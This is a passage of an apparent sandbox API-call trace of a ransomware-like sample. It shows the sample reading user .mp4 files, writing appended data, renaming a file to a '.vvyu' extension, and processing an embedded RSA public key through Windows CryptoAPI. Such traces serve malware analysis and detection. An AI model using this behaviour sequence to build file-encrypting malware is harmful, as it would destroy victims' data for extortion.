dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0197.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0197.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a480 [0197.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a468 [0197.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0197.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0197.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0197.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0197.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.779] GetCurrentThreadId () returned 0x264 [0197.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4bee0 [0197.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0197.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.780] GetCurrentThreadId () returned 0x264 [0197.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0197.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a480 [0197.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4e0 [0197.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0197.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0197.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0197.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4f8 [0197.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a498 [0197.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0197.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a468 [0197.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0197.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0197.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d430 | out: hHeap=0x6a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.792] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x796b, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x796b, lpOverlapped=0x0) returned 1 [0197.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.793] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x7970, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.793] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.795] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.795] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.795] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.795] CloseHandle (hObject=0x52c) returned 1 [0197.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0197.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d3a670 [0197.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0197.799] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\EDTDz9.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\edtdz9.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\EDTDz9.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\edtdz9.mp4.vvyu")) returned 1 [0197.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.802] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0197.804] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51163530, ftCreationTime.dwHighDateTime=0x1d89799, ftLastAccessTime.dwLowDateTime=0x19024c00, ftLastAccessTime.dwHighDateTime=0x1d89ec0, ftLastWriteTime.dwLowDateTime=0x19024c00, ftLastWriteTime.dwHighDateTime=0x1d89ec0, nFileSizeHigh=0x0, nFileSizeLow=0xcde6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fjxa.mp4", cAlternateFileName="")) returned 1 [0197.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0197.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.805] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\Fjxa.mp4") returned=".mp4" [0197.805] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\Fjxa.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\fjxa.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.809] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=52710) returned 1 [0197.809] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.812] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xcdc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.812] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.814] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.814] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xcde6, lpOverlapped=0x0) returned 1 [0197.815] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.815] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.815] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.816] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0197.816] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.816] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.816] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.817] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.817] GetLastError () returned 0x0 [0197.817] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.817] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0197.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.817] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.817] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.817] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.817] HeapFree (in: 